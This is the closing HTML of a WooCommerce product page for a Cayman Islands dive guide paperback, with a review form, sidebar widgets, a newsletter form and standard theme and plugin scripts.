						<option value="">Rate&hellip;</option>
						<option value="5">Perfect</option>
						<option value="4">Good</option>
						<option value="3">Average</option>
						<option value="2">Not that bad</option>
						<option value="1">Very poor</option>
					</select></div><p class="comment-form-comment"><label for="comment">Your review&nbsp;<span class="required">*</span></label><textarea id="comment" name="comment" cols="45" rows="8" required></textarea></p><p class="comment-form-author"><label for="author">Name&nbsp;<span class="required">*</span></label><input id="author" name="author" type="text" value="" size="30" required /></p>
<p class="comment-form-email"><label for="email">Email&nbsp;<span class="required">*</span></label><input id="email" name="email" type="email" value="" size="30" required /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Submit" /> <input type='hidden' name='comment_post_ID' value='372' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
				</div>
		</div>
	
	<div class="clear"></div>
</div>
			</div>
		
			</div>

</div>


		
	                        </main><!-- #main -->
                    </div><!-- #primary -->

                    		<aside id="secondaryright" class="widget-area right" role="complementary">
			<aside id="categories-2" class="widget widget_categories"><h2 class="spstore widget-title">Blog categories</h2>		<ul>
				<li class="cat-item cat-item-4"><a href="https://prideautomations.com/category/art/">Art</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://prideautomations.com/category/beauty/">Beauty</a>
</li>
		</ul>
			</aside><style>
.rpwe-block ul{list-style:none!important;margin-left:0!important;padding-left:0!important;}.rpwe-block li{border-bottom:1px solid #eee;margin-bottom:10px;padding-bottom:10px;list-style-type: none;}.rpwe-block a{display:inline!important;text-decoration:none;}.rpwe-block h3{background:none!important;clear:none;margin-bottom:0!important;margin-top:0!important;font-weight:400;font-size:12px!important;line-height:1.5em;}.rpwe-thumb{border:1px solid #EEE!important;box-shadow:none!important;margin:2px 10px 2px 0;padding:3px!important;}.rpwe-summary{font-size:12px;}.rpwe-time{color:#bbb;font-size:11px;}.rpwe-comment{color:#bbb;font-size:11px;padding-left:5px;}.rpwe-alignleft{display:inline;float:left;}.rpwe-alignright{display:inline;float:right;}.rpwe-aligncenter{display:block;margin-left: auto;margin-right: auto;}.rpwe-clearfix:before,.rpwe-clearfix:after{content:"";display:table !important;}.rpwe-clearfix:after{clear:both;}.rpwe-clearfix{zoom:1;}
</style>
	<aside id="rpwe_widget-3" class="widget rpwe_widget recent-posts-extended"><h2 class="spstore widget-title">Editor&#8217;s choice</h2><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://prideautomations.com/this-product-will-make-you-ditch-all-your-temporary-fixes-for-grey-hair/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://prideautomations.com/wp-content/uploads/2020/03/TR-back-side-100x100.jpg" alt="This product will make you ditch all your temporary fixes for grey hair"></a><h3 class="rpwe-title"><a href="https://prideautomations.com/this-product-will-make-you-ditch-all-your-temporary-fixes-for-grey-hair/" title="Permalink to This product will make you ditch all your temporary fixes for grey hair" rel="bookmark">This product will make you ditch all your temporary fixes for grey hair</a></h3><time class="rpwe-time published" datetime="2019-12-26T14:08:25+00:00">December 26, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://prideautomations.com/how-to-get-the-haircut-you-want-at-the-hairdresser/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://prideautomations.com/wp-content/uploads/2020/03/haircut-woman-1-100x100.jpg" alt="How to get the haircut you want at the hairdresser"></a><h3 class="rpwe-title"><a href="https://prideautomations.com/how-to-get-the-haircut-you-want-at-the-hairdresser/" title="Permalink to How to get the haircut you want at the hairdresser" rel="bookmark">How to get the haircut you want at the hairdresser</a></h3><time class="rpwe-time published" datetime="2020-03-04T22:54:26+00:00">March 4, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://prideautomations.com/the-gourmands-fruit-stand/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://prideautomations.com/wp-content/uploads/2020/03/Gourmand_Vitsoe_Yann-Le-Bec_-600x851-1-100x100.jpg" alt="The Gourmand’s Fruit Stand"></a><h3 class="rpwe-title"><a href="https://prideautomations.com/the-gourmands-fruit-stand/" title="Permalink to The Gourmand’s Fruit Stand" rel="bookmark">The Gourmand’s Fruit Stand</a></h3><time class="rpwe-time published" datetime="2020-01-21T23:56:47+00:00">January 21, 2020</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></aside><aside id="mc4wp_form_widget-3" class="widget widget_mc4wp_form_widget"><h2 class="spstore widget-title">Newsletter subscription</h2><script>(function() {
	window.mc4wp = window.mc4wp || {
		listeners: [],
		forms: {
			on: function(evt, cb) {
				window.mc4wp.listeners.push(
					{
						event   : evt,
						callback: cb
					}
				);
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.7.5 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-310" method="post" data-id="310" data-name="" ><div class="mc4wp-form-fields"><p>
	
		<input type="email" name="EMAIL" placeholder="Your email address" required />
</label>
</p>

<p>
	<input type="submit" value="Sign up" />
</p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1585723707" /><input type="hidden" name="_mc4wp_form_id" value="310" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></aside>		</aside><!-- #secondary -->
	
                </div>
            </div>
        </div>
    
	
		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="footer-middle">
			<div class="container">                
			<div class="clear">                

				
				
				
				 
					
			</div>
			</div>
		</div>
			<div class="footer-top">
		  <div class="container">
	        <div class="sociallink">
	      		      <div class="social">
        <ul>
                                                                    </ul>
      </div>
    	            
	        </div>
	        <div class="paymentlogo">
	        	      <div class="payment-accept">
                                                      </div>
      	        </div>
		  </div>
		</div>
				<div class="footer-bottom">
		    <div class="container">
	       		<div class="coppyright">
					&copy; 2020 Pride Automations -  WordPress Theme : SparkleStore  By <a href=" http://sparklewpthemes.com/ " rel="designer" target="_blank">Sparkle Themes</a>				</div><!-- .site-info -->

	            <div class="companylinks">
	          		<ul id="menu-legal-menu" class=""><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="/dmca">DMCA</a></li>
<li id="menu-item-16" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
</ul>	            </div>

		    </div>
		</div>
				</footer>
		    

</div><!-- #page -->

<a href="#" class="scrollup">
	<i class="fa fa-angle-up" aria-hidden="true"></i>
</a>

<script>(function() {function maybePrefixUrlField() {
	if (this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if (urlFields) {
	for (var j=0; j < urlFields.length; j++) {
		urlFields[j].addEventListener('blur', maybePrefixUrlField);
	}
}
})();</script><script type="application/ld+json">{"@context":"https:\/\/schema.org\/","@type":"Product","@id":"https:\/\/prideautomations.com\/product\/dive-the-cayman-islands-interlink-dive-guide-paperback\/#product","name":"Dive the Cayman Islands (Interlink Dive Guide) Paperback","url":"https:\/\/prideautomations.com\/product\/dive-the-cayman-islands-interlink-dive-guide-paperback\/","description":"World-class diving is a Cayman Islands highlight, home to the Cayman Trench, a 2500-foot trough that is the deepest part of Caribbean waters. This definitive guide provides extensive coverage of the area's more than 200 dive and snorkel areas. Includes pictures and charts in full color.","image":"https:\/\/prideautomations.com\/wp-content\/uploads\/2020\/04\/Dive-the-Cayman-Islands.jpg","sku":372,"offers":[{"@type":"Offer","price":"24.00","priceValidUntil":"2021-12-31","priceSpecification":{"price":"24.00","priceCurrency":"USD","valueAddedTaxIncluded":"false"},"priceCurrency":"USD","availability":"http:\/\/schema.org\/InStock","url":"https:\/\/prideautomations.com\/product\/dive-the-cayman-islands-interlink-dive-guide-paperback\/","seller":{"@type":"Organization","name":"Pride Automations","url":"https:\/\/prideautomations.com"}}]}</script>
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
	<div class="pswp__bg"></div>
	<div class="pswp__scroll-wrap">
		<div class="pswp__container">
			<div class="pswp__item"></div>
			<div class="pswp__item"></div>
			<div class="pswp__item"></div>
		</div>
		<div class="pswp__ui pswp__ui--hidden">
			<div class="pswp__top-bar">
				<div class="pswp__counter"></div>
				<button class="pswp__button pswp__button--close" aria-label="Close (Esc)"></button>
				<button class="pswp__button pswp__button--share" aria-label="Share"></button>
				<button class="pswp__button pswp__button--fs" aria-label="Toggle fullscreen"></button>
				<button class="pswp__button pswp__button--zoom" aria-label="Zoom in/out"></button>
				<div class="pswp__preloader">
					<div class="pswp__preloader__icn">
						<div class="pswp__preloader__cut">
							<div class="pswp__preloader__donut"></div>
						</div>
					</div>
				</div>
			</div>
			<div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
				<div class="pswp__share-tooltip"></div>
			</div>
			<button class="pswp__button pswp__button--arrow--left" aria-label="Previous (arrow left)"></button>
			<button class="pswp__button pswp__button--arrow--right" aria-label="Next (arrow right)"></button>
			<div class="pswp__caption">
				<div class="pswp__caption__center"></div>
			</div>
		</div>
	</div>
</div>
	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/prideautomations.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.0.1'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.min.js?ver=1.7.21'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/flexslider/jquery.flexslider.min.js?ver=2.7.2'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js?ver=4.1.1'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe-ui-default.min.js?ver=4.1.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_single_product_params = {"i18n_required_rating_text":"Please select a rating","review_rating_required":"yes","flexslider":{"rtl":false,"animation":"slide","smoothHeight":true,"directionNav":false,"controlNav":"thumbnails","slideshow":false,"animationSpeed":500,"animationLoop":false,"allowOneSlide":false},"zoom_enabled":"1","zoom_options":[],"photoswipe_enabled":"1","photoswipe_options":{"shareEl":false,"closeOnScroll":false,"history":false,"hideAnimationDuration":0,"showAnimationDuration":0},"flexslider_enabled":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js?ver=4.0.1'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_5bf50ecc621c7f1d827e3056ac222492","fragment_name":"wc_fragments_5bf50ecc621c7f1d827e3056ac222492","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4.0.1'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/lightslider/js/lightslider.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/theia-sticky-sidebar/js/theia-sticky-sidebar.min.js?ver=1.0.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sparklestore_tabs_ajax_action = {"ajaxurl":"https:\/\/prideautomations.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/js/common.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/js/skip-link-focus-fix.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/js/navigation.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-includes/js/comment-reply.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.7.5'></script>

		<!-- Cookie Notice plugin v1.2.51 by Digital Factory https://dfactory.eu/ -->
		<div id="cookie-notice" role="banner" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: #000;"><div class="cookie-notice-container" style="color: #fff;"><span id="cn-notice-text" class="cn-text-container">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Accept</a><a href="#" id="cn-refuse-cookie" data-cookie-set="refuse" class="cn-set-cookie cn-button bootstrap button">Refuse</a><a href="https://prideautomations.com/cookie-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Cookie Privacy policy</a></span></div>
			<div class="cookie-revoke-container" style="color: #fff;"><span id="cn-revoke-text" class="cn-text-container">You can revoke your consent any time using the Revoke consent button.</span><span id="cn-revoke-buttons" class="cn-buttons-container"><a href="#" class="cn-revoke-cookie cn-button bootstrap button">Revoke consent</a></span>
			</div>
		</div>
		<!-- / Cookie Notice plugin -->
</body>

</html>
